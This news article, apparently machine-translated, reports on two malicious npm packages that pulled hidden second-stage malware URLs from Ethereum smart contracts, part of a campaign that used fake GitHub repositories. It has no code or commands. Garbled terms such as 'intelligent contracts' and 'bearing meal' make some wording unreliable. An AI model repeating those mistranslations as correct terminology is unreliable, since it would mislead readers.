Ethereum has become the last front for the attacks of the software supply chain.
Reversinglabs researchers earlier this week discovered two malicious NPM packages that used Ethereum’s intelligent contracts to hide the harmful code, allowing malware to omits traditional security controls.
NPM is a package administrator for the NODE.JS execution environment and is considered the largest software record in the world, where developers can access and share code that contributes to millions of software programs.
The packages, “Colortooolsv2” and “Mimelib2”, were charged to the node package manager’s repository widely used in July. They seemed to be simple utilities at first glance, but in practice, they took advantage of the Ethereum block chain to obtain hidden URLs that directed the committed systems to download malware in the second stage.
When integrating these commands into an intelligent contract, the attackers disguised their activity as legitimate traffic of blockchain, which makes detection difficult.
“This is something we have not seen before,” said Reversion researcher Lucija Valentić in her report. “The rapid evolution of the evasion strategies of malicious actors that are trrolleting open source repositories and developers.”
The technique is based on an old play book. Past attacks have used trusted services such as Github Gists, Google Drive or OneDrive to house malicious links. By taking advantage of Ethereum Smart Contracts, instead, the attackers added a cryptographic flavor twist to an already dangerous supply chain tactic.
The incident is part of a broader campaign. Reversinglabs discovered the packages linked to false github repositories that were passed through cryptocurrency trade bots. These repositories were padded with manufactured confirmations, false user accounts and inflated stars counts to be legitimate.
The developers who withdrew the code risked to import malware without being aware of it.
The risks of the supply chain in open source encryption tools are not new. Last year, the researchers marked more than 20 malicious campaigns aimed at developers through repositories such as NPM and Pypi.
Many aimed to steal wallet credentials or install cryptographic miners. But the use of Ethereum’s intelligent contracts as a delivery mechanism shows that adversaries are adapting rapidly to mix with blockchain ecosystems.
A bearing meal for developers is that popular commitments or active maintainers can be false, and even seemingly harmless packages can carry hidden useful loads.
